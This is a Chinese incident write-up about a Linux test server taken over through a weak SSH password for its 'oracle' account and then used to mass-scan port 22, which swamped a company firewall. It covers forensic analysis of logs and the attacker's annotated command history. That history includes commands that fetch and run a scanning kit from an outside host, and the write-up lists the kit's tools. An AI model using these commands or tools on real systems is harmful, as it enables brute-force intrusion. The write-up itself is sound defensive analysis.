?1、從防火墻癱瘓說起

今天還沒到公司就被電話告知辦公室無法正常連接互聯網了，網速非常慢，無法正常瀏覽網頁。急急忙忙感到公司，開始查找問題。

首先排除了交換機故障，因為內部局域網正常。當ping防火墻設備時，丟包嚴重。很明顯，防火墻出了問題，撐不住了，其Web管理界面根本無法正常登陸。立即聯系其服務商遠程查找問題，經過近3個小時的分析，得出結論是網內有兩臺

主機A配置如下：

OS?-?RedHat?Enterprise?Linux?Server?release?6.x?
部署軟件?-?Tomcat，sshd,?oracle?
RAM?-?8GB?
CPU?-?Intel?Core?i3-2130?
IP地址?-?172.16.111.22?

主機B為客戶托管主機，具體配置不詳。

本文只對主機A進行分析處理。

通過防火墻命令行界面，抓包發現A機器瘋狂對一組IP地址進行22端口掃描。下面是抓包結果片段：

proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22,?packet=3,?bytes=208[REPLY]?183.58.99.130:22=====>59.46.161.39:39895,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22,?packet=3,?bytes=208[REPLY]?183.58.99.131:22=====>59.46.161.39:33967,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22,?packet=3,?bytes=208[REPLY]?183.58.99.132:22=====>59.46.161.39:34117,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22,?packet=3,?bytes=208[REPLY]?183.58.99.125:22=====>59.46.161.39:54932,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22,?packet=3,?bytes=208[REPLY]?183.58.99.135:22=====>59.46.161.39:60333,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22,?packet=3,?bytes=208[REPLY]?183.58.99.136:22=====>59.46.161.39:52737,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22,?packet=3,?bytes=208[REPLY]?183.58.99.137:22=====>59.46.161.39:52291,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22,?packet=3,?bytes=208[REPLY]?183.58.99.138:22=====>59.46.161.39:46183,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22,?packet=3,?bytes=208[REPLY]?183.58.99.139:22=====>59.46.161.39:36864,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22,?packet=3,?bytes=208[REPLY]?183.58.99.133:22=====>59.46.161.39:34515,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22,?packet=3,?bytes=208[REPLY]?183.58.99.134:22=====>59.46.161.39:57121,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22,?packet=3,?bytes=208[REPLY]?183.58.99.140:22=====>59.46.161.39:37830,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22,?packet=3,?bytes=208[REPLY]?183.58.99.141:22=====>59.46.161.39:42742,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22,?packet=3,?bytes=208[REPLY]?183.58.99.142:22=====>59.46.161.39:55018,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22,?packet=3,?bytes=208[REPLY]?183.58.99.143:22=====>59.46.161.39:46447,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22,?packet=3,?bytes=208[REPLY]?183.58.99.147:22=====>59.46.161.39:51039,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22,?packet=3,?bytes=208[REPLY]?183.58.99.146:22=====>59.46.161.39:33123,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22,?packet=3,?bytes=208[REPLY]?183.58.99.151:22=====>59.46.161.39:35956,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22,?packet=3,?bytes=208[REPLY]?183.58.99.145:22=====>59.46.161.39:45002,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22,?packet=3,?bytes=208[REPLY]?183.58.99.150:22=====>59.46.161.39:54711,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22,?packet=3,?bytes=208[REPLY]?183.58.99.155:22=====>59.46.161.39:58976,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22,?packet=3,?bytes=208[REPLY]?183.58.99.157:22=====>59.46.161.39:37967,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22,?packet=3,?bytes=208[REPLY]?183.58.99.158:22=====>59.46.161.39:47125,?packet=0,?bytes=0?
proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22,?packet=3,?bytes=208[REPLY]?183.58.99.156:22=====>59.46.161.39:35028,?packet=0,?bytes=0?

可以清晰的看到，肉雞掃描程序瘋狂掃描一個網段內的22端口。

2、查找黑客行蹤的方法

對于Linux主機，出現問題后分析和處理的依據主要是日志。/var/log/messages、/var/log/secure都是必不可少的分析目標，然后就是.bash_history命令記錄。黑客登錄主機必然會在日志中留下記錄，高級黑客也許可以刪除痕跡，但目前大部分黑客都是利用現成工具的黑心者，并無太多技術背景。該主機對外開放三個TCP偵聽端口：

22?sshd?
80?Tomcat?
1521?Oracle?

這三個服務都有可能存在漏洞而被攻擊，最容易被掃描攻擊的還是sshd用戶名密碼被破解。所以最先分析 /var/log/secure日志，看登錄歷史。

3、淪陷過程分析

3.1 oracle用戶密碼被破解

分析/var/log/secure日志。不看不知道一看嚇一跳，該日志已經占用了四個文件，每個文件都記錄了大量嘗試登錄的情況，執行命令：

cat?secure-20150317?|?grep?'Failed?password'?|?cut?-d?"?"?-f?9,10,11?|?sort?|?uniq?

結果如下：

invalid?user?admin??
invalid?user?dacx??
invalid?user?details3??
invalid?user?drishti??
invalid?user?ferreluque??
invalid?user?git??
invalid?user?hall??
invalid?user?jparksu??
invalid?user?last??
invalid?user?patrol??
invalid?user?paul??
invalid?user?pgadmin??
invalid?user?postgres??
invalid?user?public??
invalid?user?sauser??
invalid?user?siginspect??
invalid?user?sql??
invalid?user?support??
invalid?user?sys??
invalid?user?sysadmin??
invalid?user?system??
invalid?user?taz??
invalid?user?test??
invalid?user?tiptop??
invalid?user?txl5460??
invalid?user?ubnt??
invalid?user?www??
mysql?from?10.10.10.1??
oracle?from?10.10.10.1??
root?from?10.10.10.1?

可以看出攻擊程序不斷采用不同的賬戶和密碼進行嘗試。然后在接近尾部的地方發現如下2行，說明被攻破了。

Mar?9?20:35:30?localhost?sshd[30379]:?Accepted?password?for?oracle?from?10.10.10.1?port?56906?ssh2?
Mar?9?20:35:30?localhost?sshd[30379]:?pam_unix(sshd:session):?session?opened?for?user?oracle?by?(uid=0)?

可見賬戶oracle的密碼被猜中，并成功登入系統。

3.2 黑客動作推演

下面看看黑客用oracle賬戶都做了什么。首先復制一份oracle的命令歷史，防止后續操作丟失該記錄。

cp?/home/oracle/.bash_history?hacker_history?

然后查看分析這個文件。 我在后面備注了黑客的想法。

vi?.bash_profile?
vi?.bash_profile?（查看.bash_profile，看變量設置，把/home/oracle/bin增加到PATH）?
ll?
cd?/?
vi?.bash_profile?
vi?.bash_profile?(執行，設置環境變量）?
w?
ps?x?（查看系統運行進程）?
free?-m?（查看內存大小）?
uname?-a?（查看系統版本）?
cat?/etc/issue?（查看系統發行版）?
cat?/etc/hosts?（查看是否有網內機器)?
cat?/proc/cpuinfo?（查看CPU型號）?
cat?.bash_history?（查看oracle賬戶歷史操作）?
w?（查看系統負載）?
ls?-a?（查看/home/oracle/下的隱藏文件）?
passwd?（修改掉oracle賬戶的密碼）?
exit??
ls??
oracle?
sqlplus?（運行sqlplus)?
su?(試圖切換到root賬戶）?
app1123456?（猜測root密碼）?
ls??
su?-?
w?
free?-m?
php?-v?（查看php版本）?
exit?
w?
free?-m?
php?-v?
ps?aux?
ls?-a?
exit?
w?
free?-m?
php?-v?
cat?bash_his?（查看歷史命令）?
cat?bash_history?
cat?.bash_history?
wget?scriptcoders.ucoz.com/piata.tgz?（下載肉雞攻擊軟件包）?
tar?zxvf?piata.tgz?（解壓軟件包）?
rm?-rf?piata.tgz?（刪除軟件包）?
cd?piata/?（切換到攻擊軟件目錄）?
ls?-a?
chmod?+x?*?
./a?210.212?（運行攻擊軟件）?
screen?（試圖運行screen命令，發現沒有后下載它）?
ls?-a?
wget?scriptcoders.ucoz.com/screen.tgz?
tar?zxvf?screen.tgz?（解壓）?
./screen?
exit?
w?
ps?x?
cd?piata/?（切換到攻擊軟件目錄）?
ls?-a?
cat?vuln.txt?（查看攻擊結果）?
ls?-a?
mv?vuln.txt?1.txt?（保存攻擊結果）?
./screen?-r?
nano?1.txt?（查看結果文件）?
w?
ps?x?
exit?
cd?piata?
ps?x?
ls?-a?
nano?2.txt?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat??
mv?vuln.txt?2.txt?（保存結果）?
nano?2.txt?
w?
ps?x?
cd?piata/?
ls-?a?
cat?vuln.txt??
rm?-rf?vuln.txt??
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
ls?-a?
mv?vuln.txt?3.txt?（保存結果）?
nano?3.txt??
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
rm?-rf?vuln.txt??
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
rm?-rf?vuln.txt??
rm?-rf?1.txt??
rm?-rf?2.txt?
rm?-rf?2.txt.save??
rm?-rf?3.txt??
screen?-r?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
ls?-a?
nano?vuln.txt??
rm?-rf?vuln.txt??
screen?-r?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
nano?vuln.txt??
w?
ls?-a?
rm?-rf?vuln.txt??
screen?-r?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
rm?-rf?vuln.txt??
ps?x?
ls?-a?
./screen?-r?
exit?
w?
ps?x?
cd?piata/?
ls?-a?
cat?vuln.txt??
nano?vuln.txt??
w?
rm?-rf?vuln.txt??
./screen?-r?
exit?

3.3 攻擊工具一覽

前面通過命令歷史記錄，可以看出攻擊工具軟件包為名為piata。下載來看看它的面目。

[root@localhost?piata]#?ll?
total?1708?
-rw-r--r--.?1?oracle?oinstall?0?Mar?10?13:01?183.63.pscan.22?
-rwxr-xr-x.?1?oracle?oinstall?659?Feb?2?2008?a?
-rwxr-xr-x.?1?oracle?oinstall?216?May?18?2005?auto?
-rwxr-xr-x.?1?oracle?oinstall?283?Nov?25?2004?gen-pass.sh?
-rwxr-xr-x.?1?oracle?oinstall?93?Apr?19?2005?go.sh?
-rwxr-xr-x.?1?oracle?oinstall?3253?Mar?5?2007?mass?
-rwxr-xr-x.?1?oracle?oinstall?12671?May?18?2008?pass_file?
-rwxr-xr-x.?1?oracle?oinstall?21407?Jul?22?2004?pscan2?
-rwxr-xr-x.?1?oracle?oinstall?249980?Feb?13?2001?screen?
-rw-r--r--.?1?oracle?oinstall?130892?Feb?3?2010?screen.tgz?
-rwxr-xr-x.?1?oracle?oinstall?453972?Jul?13?2004?ss?
-rwxr-xr-x.?1?oracle?oinstall?842736?Nov?24?2004?ssh-scan?
-rw-r--r--.?1?oracle?oinstall?2392?Mar?10?05:03?vuln.txt?

其中 a, auto, go.sh gen-pass.sh, 都是bash腳本文件，用于配置掃描網段，調用掃描程序。pscan2和ssh-scan則為掃描程序。 vuln.txt記錄獲得的肉雞列表。

目前尚未發現其他系統文件被黑客修改，也沒有自動運行攻擊軟件的設置。

4 深刻教訓

雖然這次被攻擊的機器只是一個測試主機，其本身的重要性并不高，但卻造成了防火墻的癱瘓，進而造成互聯網不能正常訪問。對此，必須引起足夠重視，并從中汲取教訓。

系統賬戶密碼一定要有一定的復雜度。這次攻擊就是由于oracle賬戶密碼過于簡單所致。

sshd采用密碼方式登錄風險很大，特別是密碼簡單的時候。可行的情況下，盡量關閉密碼方式，改用公鑰方式。

作為數據中心管理員，一定要監督監管系統管理員和軟件開發商的服務安全，本次被攻擊主機就是把所有權限都放給了網站開發公司，而開發公司對運營安全并不重視。

本文標題：一次服務器淪陷為肉雞后的實戰排查過程！
標題路徑：http://m.kartarina.com/news9/99009.html

成都網站建設公司_創新互聯，為您提供建站公司、ChatGPT、網頁設計公司、品牌網站建設、網站營銷、動態網站

廣告

聲明：本網站發布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創新互聯